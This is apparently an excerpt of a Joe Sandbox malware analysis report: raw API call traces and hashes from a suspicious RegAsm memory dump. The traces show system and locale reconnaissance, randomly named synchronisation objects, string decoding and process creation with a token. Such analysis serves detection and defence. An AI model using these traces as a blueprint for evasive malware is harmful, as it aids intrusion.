Part of subcall function 0040F788: ReleaseMutex.KERNEL32(00410AB3), ref: 0040F863
Part of subcall function 0040F788: OutputDebugStringA.KERNEL32(t1pi8p487), ref: 0040F86E
Part of subcall function 0040F788: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_fgohzvee), ref: 0040F879
Part of subcall function 0040F788: CancelWaitableTimer.KERNEL32(00000000), ref: 0040F880
Part of subcall function 0040F788: GetLastError.KERNEL32 ref: 0040F882
Part of subcall function 0040F788: CreateFileMappingW.KERNEL32(000000FF,00000000,00000004,00000000,00000A8C,00000000), ref: 0040F892
Part of subcall function 0040F788: RegOpenKeyExA.ADVAPI32(80000001,regr3z819eq,00000000,00020019,?), ref: 0040F8AF
Part of subcall function 0040F788: CloseHandle.KERNEL32(00000000), ref: 0040F8B6
Part of subcall function 0040F788: SetEnvironmentVariableA.KERNEL32(wem6yeez,xjah9ors), ref: 0040F8C6

FindClose.KERNEL32(00000000), ref: 004096FA

Part of subcall function 0040ED79: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_t2lry32w), ref: 0040ED9D
Part of subcall function 0040ED79: CancelWaitableTimer.KERNEL32(00000000), ref: 0040EDA4
Part of subcall function 0040ED79: CreateMutexA.KERNEL32(00000000,00000000,MTX9of20kmn), ref: 0040EDB1
Part of subcall function 0040ED79: OutputDebugStringA.KERNELBASE(t6xplss11), ref: 0040EDCE
Part of subcall function 0040ED79: ReleaseMutex.KERNEL32(00000000), ref: 0040EDD1
Part of subcall function 0040ED79: RegOpenKeyExA.KERNEL32(80000001,regp7r1ymid,00000000,00020019,?), ref: 0040EDED
Part of subcall function 0040ED79: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_7pn5tvkk), ref: 0040EE0A
Part of subcall function 0040ED79: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040EE14
Part of subcall function 0040ED79: RegOpenKeyExA.KERNEL32(80000001,regd0052drm,00000000,00020019,?), ref: 0040EE32
Part of subcall function 0040ED79: LocalAlloc.KERNEL32(00000000,00000914), ref: 0040EE3A
Part of subcall function 0040ED79: RegOpenKeyExA.KERNEL32(80000001,regou0dc9en,00000000,00020019,00409D4B), ref: 0040EE57
Part of subcall function 0040ED79: LocalFree.KERNEL32(00000000), ref: 0040EE5A
Part of subcall function 0040ED79: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLk6eld4rr), ref: 0040EE6B
Part of subcall function 0040ED79: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040EE75
Part of subcall function 0040ED79: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_gc0upe3h), ref: 0040EE84
Part of subcall function 0040ED79: SetEvent.KERNEL32(00000000), ref: 0040EE8D
Part of subcall function 0040ED79: ResetEvent.KERNEL32(00000000), ref: 0040EE94
Part of subcall function 0040ED79: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_mn0c9pqk), ref: 0040EEA3
Part of subcall function 0040ED79: GetLastError.KERNEL32 ref: 0040EEAB

StrStrW.SHLWAPI(0000002E,00000000), ref: 00409602

Part of subcall function 0040F012: RegOpenKeyExA.ADVAPI32(80000001,regwog66qaw,00000000,00020019,?,?,00000000,?,771B2F20), ref: 0040F217

Part of subcall function 004084FB: GetFileSize.KERNEL32(00000000,00000000), ref: 004085F0

LocalFree.KERNEL32(00000000), ref: 004096D6
LocalFree.KERNEL32(00000000), ref: 00409704
CloseHandle.KERNEL32(004081BE), ref: 0040970D

Part of subcall function 0040F012: lstrlenW.KERNEL32(?,00000000,?,771B2F20), ref: 0040F02F
Part of subcall function 0040F012: lstrlenW.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F034
Part of subcall function 0040F012: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000A28,00000000,?,?,00000000,?,771B2F20), ref: 0040F06C
Part of subcall function 0040F012: FindCloseChangeNotification.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F073
Part of subcall function 0040F012: LocalAlloc.KERNEL32(00000000,000005DD,?,00000000,?,771B2F20), ref: 0040F07F
Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,771B2F20), ref: 0040F08D
Part of subcall function 0040F012: LocalFree.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F090
Part of subcall function 0040F012: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_pg3esy2g), ref: 0040F09E
Part of subcall function 0040F012: CancelWaitableTimer.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F0A5
Part of subcall function 0040F012: OutputDebugStringA.KERNELBASE(t26t01mzg,?,00000000,?,771B2F20), ref: 0040F0B6
Part of subcall function 0040F012: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_n39w6qzp,?,00000000,?,771B2F20), ref: 0040F0C3
Part of subcall function 0040F012: SetEvent.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F0CC
Part of subcall function 0040F012: ResetEvent.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F0D3
Part of subcall function 0040F012: CreateMutexA.KERNEL32(00000000,00000000,MTXid6eg7kl,?,00000000,?,771B2F20), ref: 0040F0E2
Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(kswx2kex,87xo3fjd,?,00000000,?,771B2F20), ref: 0040F0FF
Part of subcall function 0040F012: ReleaseMutex.KERNEL32(?,?,00000000,?,771B2F20), ref: 0040F104
Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(mjtppkej,54dhluqg,?,00000000,?,771B2F20), ref: 0040F114
Part of subcall function 0040F012: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_b67hznar), ref: 0040F131
Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,771B2F20), ref: 0040F139
Part of subcall function 0040F012: CancelWaitableTimer.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F140
Part of subcall function 0040F012: OutputDebugStringA.KERNEL32(t7fwgbo5x,?,00000000,?,771B2F20), ref: 0040F14B

Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,771B2F20), ref: 0040F118
Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,771B2F20), ref: 0040F150
Part of subcall function 0040F012: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,000005D6,00000000,?,00000000,?,771B2F20), ref: 0040F165
Part of subcall function 0040F012: FindCloseChangeNotification.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F16C
Part of subcall function 0040F012: OutputDebugStringA.KERNEL32(tv49i65z7,?,00000000,?,771B2F20), ref: 0040F177
Part of subcall function 0040F012: FindFirstFileA.KERNEL32(s_t4ckbkwe,?,?,00000000,?,771B2F20), ref: 0040F185
Part of subcall function 0040F012: FindClose.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F18C
Part of subcall function 0040F012: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_qjkqlbwl), ref: 0040F1A1
Part of subcall function 0040F012: OutputDebugStringA.KERNELBASE(t9kx5wueg,?,00000000,?,771B2F20), ref: 0040F1AA
Part of subcall function 0040F012: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000,?,00000000,?,771B2F20), ref: 0040F1B7
Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(b4j4f6xx,jcezxitk,?,00000000,?,771B2F20), ref: 0040F1C7
Part of subcall function 0040F012: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLamfolgz0), ref: 0040F1D8
Part of subcall function 0040F012: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000,?,00000000,?,771B2F20), ref: 0040F1E0
Part of subcall function 0040F012: OutputDebugStringA.KERNEL32(t1v6z4di9,?,00000000,?,771B2F20), ref: 0040F1E7
Part of subcall function 0040F012: CreateMutexA.KERNEL32(00000000,00000000,MTXdxglk35i,?,00000000,?,771B2F20), ref: 0040F1F0
Part of subcall function 0040F012: ReleaseMutex.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F1FB
Part of subcall function 0040F012: LocalAlloc.KERNEL32(00000000,00000461,?,00000000,?,771B2F20), ref: 0040F223
Part of subcall function 0040F012: GlobalFree.KERNEL32(?), ref: 0040F22C

LocalFree.KERNEL32(00000000), ref: 0040971F
LocalFree.KERNEL32(?), ref: 00409731

Strings

., xrefs: 004095DF
idb, xrefs: 004096BB

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Create$LocalTimerWaitable$Semaphore$EventRelease$DebugFreeMutexOutputString$ErrorLast$CloseOpen$CancelEnvironmentFileFindVariable$Alloc$MappingReset$ChangeHandleNotificationlstrlen$FirstGlobalSize
String ID: .$idb
API String ID: 1580788619-1923612777
Opcode ID: 9c32ff9d3aae1c83641d71ce5ea039281ab6c33705f5732d1f77ae3e53f104ac
Instruction ID: 6600bc9669456c75c1548beabd834cbc03eda2d9fb417775d0fc27846d305e05
Opcode Fuzzy Hash: 9c32ff9d3aae1c83641d71ce5ea039281ab6c33705f5732d1f77ae3e53f104ac
Instruction Fuzzy Hash: 83815475A00605EFDB15DFE4DC95EEE7BB9FB88300F048079E915A7291DB789D008BA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040CF9A Relevance: 13.6, APIs: 9, Instructions: 131stringCOMMON

Download Yara Rule

APIs

lstrcpyn.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,0040D74E,?,?), ref: 0040D006
lstrcpyn.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,0040D74E,?,?), ref: 0040D046
lstrcpyn.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,0040D74E,?,?), ref: 0040D086
GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0040D74E,?,?,?,?), ref: 0040D090

Part of subcall function 0040ED79: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_t2lry32w), ref: 0040ED9D
Part of subcall function 0040ED79: CancelWaitableTimer.KERNEL32(00000000), ref: 0040EDA4
Part of subcall function 0040ED79: CreateMutexA.KERNEL32(00000000,00000000,MTX9of20kmn), ref: 0040EDB1
Part of subcall function 0040ED79: OutputDebugStringA.KERNELBASE(t6xplss11), ref: 0040EDCE
Part of subcall function 0040ED79: ReleaseMutex.KERNEL32(00000000), ref: 0040EDD1
Part of subcall function 0040ED79: RegOpenKeyExA.KERNEL32(80000001,regp7r1ymid,00000000,00020019,?), ref: 0040EDED
Part of subcall function 0040ED79: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_7pn5tvkk), ref: 0040EE0A
Part of subcall function 0040ED79: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040EE14
Part of subcall function 0040ED79: RegOpenKeyExA.KERNEL32(80000001,regd0052drm,00000000,00020019,?), ref: 0040EE32
Part of subcall function 0040ED79: LocalAlloc.KERNEL32(00000000,00000914), ref: 0040EE3A
Part of subcall function 0040ED79: RegOpenKeyExA.KERNEL32(80000001,regou0dc9en,00000000,00020019,00409D4B), ref: 0040EE57
Part of subcall function 0040ED79: LocalFree.KERNEL32(00000000), ref: 0040EE5A
Part of subcall function 0040ED79: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLk6eld4rr), ref: 0040EE6B
Part of subcall function 0040ED79: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040EE75
Part of subcall function 0040ED79: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_gc0upe3h), ref: 0040EE84
Part of subcall function 0040ED79: SetEvent.KERNEL32(00000000), ref: 0040EE8D
Part of subcall function 0040ED79: ResetEvent.KERNEL32(00000000), ref: 0040EE94
Part of subcall function 0040ED79: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_mn0c9pqk), ref: 0040EEA3
Part of subcall function 0040ED79: GetLastError.KERNEL32 ref: 0040EEAB

wsprintfW.USER32 ref: 0040D0AE

Part of subcall function 0040F012: lstrlenW.KERNEL32(?,00000000,?,771B2F20), ref: 0040F02F
Part of subcall function 0040F012: lstrlenW.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F034
Part of subcall function 0040F012: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000A28,00000000,?,?,00000000,?,771B2F20), ref: 0040F06C
Part of subcall function 0040F012: FindCloseChangeNotification.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F073
Part of subcall function 0040F012: LocalAlloc.KERNEL32(00000000,000005DD,?,00000000,?,771B2F20), ref: 0040F07F
Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,771B2F20), ref: 0040F08D
Part of subcall function 0040F012: LocalFree.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F090
Part of subcall function 0040F012: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_pg3esy2g), ref: 0040F09E
Part of subcall function 0040F012: CancelWaitableTimer.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F0A5
Part of subcall function 0040F012: OutputDebugStringA.KERNELBASE(t26t01mzg,?,00000000,?,771B2F20), ref: 0040F0B6
Part of subcall function 0040F012: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_n39w6qzp,?,00000000,?,771B2F20), ref: 0040F0C3
Part of subcall function 0040F012: SetEvent.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F0CC
Part of subcall function 0040F012: ResetEvent.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F0D3
Part of subcall function 0040F012: CreateMutexA.KERNEL32(00000000,00000000,MTXid6eg7kl,?,00000000,?,771B2F20), ref: 0040F0E2
Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(kswx2kex,87xo3fjd,?,00000000,?,771B2F20), ref: 0040F0FF
Part of subcall function 0040F012: ReleaseMutex.KERNEL32(?,?,00000000,?,771B2F20), ref: 0040F104
Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(mjtppkej,54dhluqg,?,00000000,?,771B2F20), ref: 0040F114
Part of subcall function 0040F012: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_b67hznar), ref: 0040F131
Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,771B2F20), ref: 0040F139
Part of subcall function 0040F012: CancelWaitableTimer.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F140
Part of subcall function 0040F012: OutputDebugStringA.KERNEL32(t7fwgbo5x,?,00000000,?,771B2F20), ref: 0040F14B

LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040D74E), ref: 0040D0C6
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040D74E), ref: 0040D0CD
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0040D74E,?,?,?,?), ref: 0040D0DC
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0040D74E,?,?,?,?), ref: 0040D0E6

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Create$Local$TimerWaitable$EventFree$MutexReleaseSemaphore$CancelDebugErrorLastOpenOutputStringlstrcpyn$AllocEnvironmentResetVariablelstrlen$ChangeCloseFileFindInfoMappingNotificationSystemwsprintf
String ID:
API String ID: 3322000596-0
Opcode ID: 803aa9287f046d8968d5376926b952ae28268aaded695131f58e169060e76356
Instruction ID: 0e3cd42aa164bcabc9caf85d428569b4861fa6abbfc3e93494755244ccdf25f0
Opcode Fuzzy Hash: 803aa9287f046d8968d5376926b952ae28268aaded695131f58e169060e76356
Instruction Fuzzy Hash: C9414EB5A00215EFDB048FA8DCC49EEBBB8FB8C354B04C17AAD09E7351D6349D058BA4

Uniqueness

Uniqueness Score: -1.00%

Function 004103E1 Relevance: 7.7, APIs: 6, Instructions: 188COMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(00000000), ref: 00410422

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FreeLocal
String ID:
API String ID: 2826327444-0
Opcode ID: b554ea5bf4692cece009cd5120c4065bde0ec0cda91d52564ff61ac337460d06
Instruction ID: d7ede38217a45fab54ca4531d21abc7ee53ee079bb872f7ad9e23168f097edcf
Opcode Fuzzy Hash: b554ea5bf4692cece009cd5120c4065bde0ec0cda91d52564ff61ac337460d06
Instruction Fuzzy Hash: DC5163B1E00215EFDB04DBA5DC45EFF7BB9EF89310F10812AE915E7290DA749D418BA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040194A Relevance: 7.6, APIs: 5, Instructions: 124COMMON

Download Yara Rule

APIs

PathCombineW.SHLWAPI(00000000,?,?), ref: 004019EE
LocalFree.KERNEL32(00000000), ref: 00401A52
FindClose.KERNEL32(00000000), ref: 00401ABF

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseCombineFindFreeLocalPath
String ID:
API String ID: 2857355001-0
Opcode ID: 06901c5958fca1620446a1cd0bfba972ce5f872ba30bdc8197b2a1ab6636e2a4
Instruction ID: f745face614c6c1a8a5a67c572eeaf69f029bf43ee1742b80752fb9b6614aa13
Opcode Fuzzy Hash: 06901c5958fca1620446a1cd0bfba972ce5f872ba30bdc8197b2a1ab6636e2a4
Instruction Fuzzy Hash: 6B41D971A00614FFCB11DBA0DC94FEA3778EB89300F00416AFA15A32A0DB399E41CF68

Uniqueness

Uniqueness Score: -1.00%

Function 0040CD2D Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

GetUserDefaultLCID.KERNEL32(00001001,00000000,00000104,?,0040D72A,?), ref: 0040CD65
GetLocaleInfoW.KERNEL32(00000000,?,0040D72A,?), ref: 0040CD6C
wsprintfW.USER32 ref: 0040CD76

Part of subcall function 0040F012: lstrlenW.KERNEL32(?,00000000,?,771B2F20), ref: 0040F02F
Part of subcall function 0040F012: lstrlenW.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F034
Part of subcall function 0040F012: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000A28,00000000,?,?,00000000,?,771B2F20), ref: 0040F06C
Part of subcall function 0040F012: FindCloseChangeNotification.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F073
Part of subcall function 0040F012: LocalAlloc.KERNEL32(00000000,000005DD,?,00000000,?,771B2F20), ref: 0040F07F
Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,771B2F20), ref: 0040F08D
Part of subcall function 0040F012: LocalFree.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F090
Part of subcall function 0040F012: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_pg3esy2g), ref: 0040F09E
Part of subcall function 0040F012: CancelWaitableTimer.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F0A5
Part of subcall function 0040F012: OutputDebugStringA.KERNELBASE(t26t01mzg,?,00000000,?,771B2F20), ref: 0040F0B6
Part of subcall function 0040F012: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_n39w6qzp,?,00000000,?,771B2F20), ref: 0040F0C3
Part of subcall function 0040F012: SetEvent.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F0CC
Part of subcall function 0040F012: ResetEvent.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F0D3
Part of subcall function 0040F012: CreateMutexA.KERNEL32(00000000,00000000,MTXid6eg7kl,?,00000000,?,771B2F20), ref: 0040F0E2
Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(kswx2kex,87xo3fjd,?,00000000,?,771B2F20), ref: 0040F0FF
Part of subcall function 0040F012: ReleaseMutex.KERNEL32(?,?,00000000,?,771B2F20), ref: 0040F104
Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(mjtppkej,54dhluqg,?,00000000,?,771B2F20), ref: 0040F114
Part of subcall function 0040F012: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_b67hznar), ref: 0040F131
Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,771B2F20), ref: 0040F139
Part of subcall function 0040F012: CancelWaitableTimer.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F140
Part of subcall function 0040F012: OutputDebugStringA.KERNEL32(t7fwgbo5x,?,00000000,?,771B2F20), ref: 0040F14B

LocalFree.KERNEL32(00000000), ref: 0040CD8E
LocalFree.KERNEL32(00000000), ref: 0040CD95

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Create$LocalTimerWaitable$EventFree$CancelDebugEnvironmentErrorLastMutexOutputStringVariablelstrlen$AllocChangeCloseDefaultFileFindInfoLocaleMappingNotificationReleaseResetUserwsprintf
String ID:
API String ID: 2454719188-0
Opcode ID: de7c6f9e22400c88161f8eb9c9a06b358d18c2b2530c697e4285a905aeedf17b
Instruction ID: 3659a6e73a7a7ca86283462a1e3c1019b3c6bd7b03ff75b1d1c0116eb8287abb
Opcode Fuzzy Hash: de7c6f9e22400c88161f8eb9c9a06b358d18c2b2530c697e4285a905aeedf17b
Instruction Fuzzy Hash: 31F04F72640604EFE3009BE5EC49EEA7BA9FBCC754F008035FB49D7291DA745C0086A8

Uniqueness

Uniqueness Score: -1.00%

Function 0040823C Relevance: 6.1, APIs: 4, Instructions: 137encryptionCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(00408903,00000000), ref: 0040827F
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?), ref: 0040832F
LocalFree.KERNEL32(00000000), ref: 00408349
LocalFree.KERNEL32(?), ref: 004083A0

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FreeLocal$BinaryByteCharCryptMultiStringWide
String ID:
API String ID: 565018292-0
Opcode ID: 35e3cf4c4005a3257d34d9b3a50ca3b6dc232470a654a9fe04234037f1d280f7
Instruction ID: e31ddda595cc7c8eaa039688536fd1fb8b0197a7ec866f80cd1fd27863d7b33c
Opcode Fuzzy Hash: 35e3cf4c4005a3257d34d9b3a50ca3b6dc232470a654a9fe04234037f1d280f7
Instruction Fuzzy Hash: 88414771A00605EFDB15CBA9DC85FFEBBB9EF88700F108069E904E72A0DB755901CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004017B3 Relevance: 6.1, APIs: 4, Instructions: 130COMMON

Download Yara Rule

APIs

PathCombineW.SHLWAPI(00000000,00000000,?), ref: 00401855
LocalFree.KERNEL32(00000000), ref: 00401875
FindClose.KERNEL32(00000000), ref: 00401893
PathCombineW.SHLWAPI(00000000,00000000,?), ref: 004018E9

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CombinePath$CloseFindFreeLocal
String ID:
API String ID: 2199340046-0
Opcode ID: f065be6deb161802adf57f14a16e04d664835443840dbbab4fdff17d63303c86
Instruction ID: 31931e9bd7c547a40b3fc9a1945ad9982713256a1c407e0db2e75d707077ff5d
Opcode Fuzzy Hash: f065be6deb161802adf57f14a16e04d664835443840dbbab4fdff17d63303c86
Instruction Fuzzy Hash: E741BB72900615EBCB11AB94DC94FEB3778EB88300F008179FA05A32A0DB35DF45CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040E38D Relevance: 6.1, APIs: 4, Instructions: 87processCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?), ref: 0040E42B
GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E445
CreateProcessWithTokenW.ADVAPI32(?,00000001,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E45F
CloseHandle.KERNEL32(00000000), ref: 0040E462

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateFileModuleNameProcessTokenWith
String ID:
API String ID: 236770008-0
Opcode ID: fb3642c99ef25df5427d8f8cd79ba35279fbcc8ced8bc4e3d89e0e5351764b76
Instruction ID: 757f429f4481b7629bc31153a339e2efa72cb715d31ceff56c811d97ed8f1a6b
Opcode Fuzzy Hash: fb3642c99ef25df5427d8f8cd79ba35279fbcc8ced8bc4e3d89e0e5351764b76
Instruction Fuzzy Hash: 4A216D71640209FBDB14DBA1DC85FEE7B79EB88710F0040B5FA05E61D0DAB49A41CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00408109 Relevance: 4.6, APIs: 3, Instructions: 103COMMON

Download Yara Rule

APIs

PathCombineW.SHLWAPI(00000000,?,?), ref: 004081A8
LocalFree.KERNEL32(00000000), ref: 004081C5
FindClose.KERNEL32(00000000), ref: 004081E2

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseCombineFindFreeLocalPath
String ID:
API String ID: 2857355001-0
Opcode ID: 3bc21bab385dde966f43d34ba8ec13fba3e52626aeb88737a01544beddf71728
Instruction ID: d09d80c2cc478856dc91d913c3842ef17c9ea8639595d1a3156bd9367906e863
Opcode Fuzzy Hash: 3bc21bab385dde966f43d34ba8ec13fba3e52626aeb88737a01544beddf71728
Instruction Fuzzy Hash: DE310775500218EFCB119B64DD84EEE7779FF98304F0041AAF945A7290EF389E42CB68

Uniqueness

Uniqueness Score: -1.00%

Function 004015BE Relevance: 4.6, APIs: 3, Instructions: 53COMMON

Download Yara Rule

APIs

StrCpyW.SHLWAPI(?,00000000), ref: 0040161A
LocalFree.KERNEL32(00000000), ref: 00401621
LocalFree.KERNEL32(00000000), ref: 0040162C

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FreeLocal
String ID:
API String ID: 2826327444-0
Opcode ID: 2eeda22f774a76b6c730be38979e7fb361d80397da193e2d03fdf794d8dea2cd
Instruction ID: dd8d91f4e05e92852b8a506f3c80202d8f16b8ee41fe3d10fcc8e94d80cd0937
Opcode Fuzzy Hash: 2eeda22f774a76b6c730be38979e7fb361d80397da193e2d03fdf794d8dea2cd
Instruction Fuzzy Hash: 8601BC72601505FBEB158BA4EC94FEF7BACEF8C340F044034B601E61A0DA71DD018AA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040CE65 Relevance: 4.5, APIs: 3, Instructions: 39timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,-00000014,771B0460), ref: 0040CE77
wsprintfW.USER32 ref: 0040CEA8

Part of subcall function 0040F012: lstrlenW.KERNEL32(?,00000000,?,771B2F20), ref: 0040F02F
Part of subcall function 0040F012: lstrlenW.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F034
Part of subcall function 0040F012: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000A28,00000000,?,?,00000000,?,771B2F20), ref: 0040F06C
Part of subcall function 0040F012: FindCloseChangeNotification.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F073
Part of subcall function 0040F012: LocalAlloc.KERNEL32(00000000,000005DD,?,00000000,?,771B2F20), ref: 0040F07F
Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,771B2F20), ref: 0040F08D
Part of subcall function 0040F012: LocalFree.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F090
Part of subcall function 0040F012: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_pg3esy2g), ref: 0040F09E
Part of subcall function 0040F012: CancelWaitableTimer.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F0A5
Part of subcall function 0040F012: OutputDebugStringA.KERNELBASE(t26t01mzg,?,00000000,?,771B2F20), ref: 0040F0B6
Part of subcall function 0040F012: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_n39w6qzp,?,00000000,?,771B2F20), ref: 0040F0C3
Part of subcall function 0040F012: SetEvent.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F0CC
Part of subcall function 0040F012: ResetEvent.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F0D3
